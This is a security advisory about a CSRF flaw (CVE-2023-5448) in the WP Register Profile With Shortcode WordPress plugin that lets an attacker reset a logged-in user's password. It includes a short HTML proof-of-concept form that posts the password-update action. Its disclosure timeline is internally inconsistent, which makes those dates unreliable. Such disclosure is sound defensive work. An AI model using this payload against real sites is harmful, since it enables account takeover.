A critical vulnerability has been uncovered during an examination of the WP Register Profile With Shortcode plugin. This flaw centers around a CSRF (Cross-Site Request Forgery) loophole specifically within the action=rpws_user_update_password functionality. This vulnerability allows an attacker to execute unauthorized password resets, posing an imminent threat to the security of user accounts, with the potential for even seizing control of administrator-level access in certain circumstances.

Main info:

PluginWP Register Profile With Shortcode <= 3.5.9
CriticalSuper High
All Time62 634
Active installations1 000+
Publicly PublishedJanuary 10, 2023
Last UpdatedJanuary 10, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A2: Broken Authentication and Session Management
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5448
Plugin Security Certification by CleanTalk


October 6, 2023Plugin testing and vulnerability detection in the WP Register Profile With Shortcode have been completed
October 6, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
January 25, 2023The author fixed the vulnerability and released the plugin update
January 10, 2023Registered CVE-2023-5448

Discovery of the Vulnerability

In the process of testing the plugin, a CSRF vulnerability was found in action=rpws_user_update_password, which allows you to change the password to any user and in some saluchayah to seize the administrator account

Understanding of CSRF attack’s

Cross-Site Request Forgery is a type of web security vulnerability that enables an attacker to force users into performing actions they did not intend. In WordPress, CSRF could manifest as unauthorized actions carried out on behalf of a user who is tricked into clicking a malicious link or visiting a compromised website. Real-world examples might include an attacker manipulating a user’s account settings or initiating unauthorized actions using the user’s credentials.

Exploiting the CSRF Vulnerability

Exploiting this CSRF vulnerability involves tricking an authenticated user into unknowingly making a request to change their password. By leveraging the CSRF attack vector on the action=rpws_user_update_password endpoint, an attacker can surreptitiously modify a user’s password, potentially leading to a full account takeover. In certain scenarios, such an attack could escalate to compromising the credentials of high-privileged accounts, such as administrators.

POC html code: 



  <script>history.pushState(”, ”, ‘/’)</script>

    <form action=”″ method=”POST”>

      <input type=”hidden” name=”option” value=”rpws&#95;user&#95;update&#95;password” />

      <input type=”hidden” name=”redirect” value=”http&#58;&#47;&#47;127&#46;0&#46;0&#46;1&#47;wordpress&#47;&#63;p&#61;49″ />

      <input type=”hidden” name=”user&#95;new&#95;password” value=”pass” />

      <input type=”hidden” name=”user&#95;retype&#95;password” value=”pass” />

      <input type=”hidden” name=”profile” value=”Update” />

      <input type=”submit” value=”Submit request” />








The potential risks associated with this vulnerability are severe and multifaceted. In real-world scenarios, attackers could:

  • Unauthorized Password Changes: Attackers can manipulate user accounts to change passwords without their consent.
  • Account Takeover: In some instances, particularly with administrator accounts, this vulnerability could lead to a complete takeover of the affected account.
  • Escalation of Privileges: If an attacker gains control of an administrator account, they could exploit elevated privileges to compromise the entire WordPress system.

This vulnerability not only jeopardizes the immediate security of the affected WordPress site but could also lead to broader consequences if the compromised data is used maliciously.

Recommendations for Improved Security

  • Immediate Patching: Developers should release an urgent patch or update that addresses this specific CSRF vulnerability.
  • User Education: Inform users about the potential risks of clicking on unfamiliar links and the importance of regularly changing passwords.
  • Multi-Factor Authentication (MFA): Encourage or enforce the use of multi-factor authentication to add an additional layer of security.
  • Security Audits: Conduct thorough security audits to identify and rectify any other potential vulnerabilities in the WordPress setup.

By implementing these measures, WordPress administrators can fortify their systems against CSRF attacks, ensuring the integrity and security of user accounts and the overall WordPress environment.

#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #SuperHighVulnerability

Use CleanTalk solutions to improve the security of your website


Create your CleanTalk account

By signing up, you agree with license. Have an account? Log in.
CVE-2023-5448 – WP Register Profile With Shortcode – CSRF to password Reset – POC

Leave a Reply

Your email address will not be published. Required fields are marked *